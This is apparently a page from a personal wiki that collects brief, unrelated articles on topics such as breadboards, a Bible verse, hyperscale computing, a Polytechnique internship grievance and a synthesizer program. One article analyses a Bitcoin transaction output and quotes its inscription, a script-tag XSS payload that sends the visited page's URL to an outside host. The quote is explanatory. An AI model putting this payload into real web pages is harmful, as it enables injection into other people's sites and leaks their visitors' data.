Wearables Updated +Created
Enter through the narrow gate Updated +Created
Gospel of Matthew 7:13:
Enter through the narrow gate. For wide is the gate and broad is the road that leads to destruction, and many enter through it.
Ciro Santilli really likes this one, because he feels that where many people go, it is useless to go again. It is much better to explore that which few can do, but which many will need.
Water Margin also comes to mind. And also A story of floating weeds.
Also known as being hipster.
Version your material Updated +Created
Whenever you make a change to your material, people should still be able to access the previous version.
Maybe there was something in the previous version that they needed, and you just removed.
Git + GitHub is the perfect way to do versioning.
Human Connectome Project Updated +Created
Hydrogen emission spectrum Updated +Created
nodejs/next/posts Updated +Created
4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af Updated +Created
Output 0 does:
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP
where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`
This is almost spendable with:
1 OP_TOALTSTACK 10 1 2
but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
Bitcoin varint Updated +Created
Implementations:
Breadboard Updated +Created
This is how electronic circuits are normally prototyped!
Once you validate them like this, the next step is usually to move on to printed circuit boards for more reliable production setups.
Breadboards are a thing of beauty and wonder.
Figure 1. . Source. Predecessors to breadboards from where the name came. A thing of beauty, so vintage. You could actually write stuff on those with a pencil!
Video 1.
Breadboards - Trash or Treasure? by Keysight (2020)
Source.
First generation immigrant Updated +Created
Google Translate Updated +Created
Hyperscale computing Updated +Created
Basically means "company with huge server farms, and which usually rents them out like Amazon AWS or Google Cloud Platform
Figure 1.
Global electricity use by data center type: 2010 vs 2018
. Source. The growth of hyperscaler cloud vs smaller cloud and private deployments was incredible in that period!
Immigrant generation Updated +Created
Careful what you wish for Updated +Created
What if I fail? What if one month in I discover that the project is undoable for some reason? Etc.
Nothing can scare a man as much as allowing him to pursue his dream! Because then he may find his dream was purely an empty illusion.
But still, we must try.
What does it mean that photons are force carriers for electromagnetism? Updated +Created
TODO find/create decent answer.
I think the best answer is something along:
A basic non-precise intuition is that a good model of reality is that electrons do not "interact with one another directly via the electromagnetic field".
A better model happens to be the quantum field theory view that the electromagnetic field interacts with the photon field but not directly with itself, and then the photon field interacts with parts of the electromagnetic field further away.
The more precise statement is that the photon field is a gauge field of the electromagnetic force under local U(1) symmetry, which is described by a Lie group. TODO understand.
This idea was first applied in general relativity, where Einstein understood that the "force of gravity" can be understood just in terms of symmetry and curvature of space. This was later applied o quantum electrodynamics and the entire Standard Model.
Bibliography:
Make your education system more efficient Updated +Created
As Ciro has rambled infinitely at Section "University", the school system is hugely inefficient and a waste of time for everyone involved.
Instead, just use Section "OurBigBook.com" instead.
This was one of the only bad experience Ciro had at Polytechnique, besides the inevitable fear of not graduating.
Ciro wanted to do a robotics internship in Germany, linked to his interests in artificial general intelligence, see also: Section "Ciro's 2D reinforcement learning games".
But the head of the applied mathematics department Polytechnique prevented him from going because Ciro didn't have the necessary grades, even though the Germans had already agreed to it: he had a C, but he needed a B. As mentioned at École Polytechnique, most Brazilians had crappy grades due to their Polytechnique-incompatible background.
This was done because in the past students with bad grades had abandoned their internships halfway and given foreigners a bad impression of Polytechnique.
It is impossible to say if the head of department really agreed with this bullshit policy, or if it was something beyond his powers and he hid his true opinion, but it felt like the agreed.
What an extremely limited view!!!
To leave the worse, the worse. To assume that grades mean anything!
And thus Ciro had to choose a last moment internship that he hated, rather than becoming the greatest roboticist that ever lived, and did terribly at it.
At least on the other hand Ciro learnt Python instead of working at the internship, and became the greatest programming tutorial writer that ever lived. Maybe.
Bristol (synthesizer) Updated +Created
Simulates vintage hardware synthesizers, and includes some pretty complex ones!
Aims to show an UI that looks exactly like the synthesizers in question.
For example for the Minimoog on Ubuntu 20.04:
sudo apt install bristol
startBristol -mini -alsa
This is a really good piece of software. You can search on YouTube how some classic synths, work, and the immediately start playing them!

Unlisted articles are being shown, click here to show only listed articles.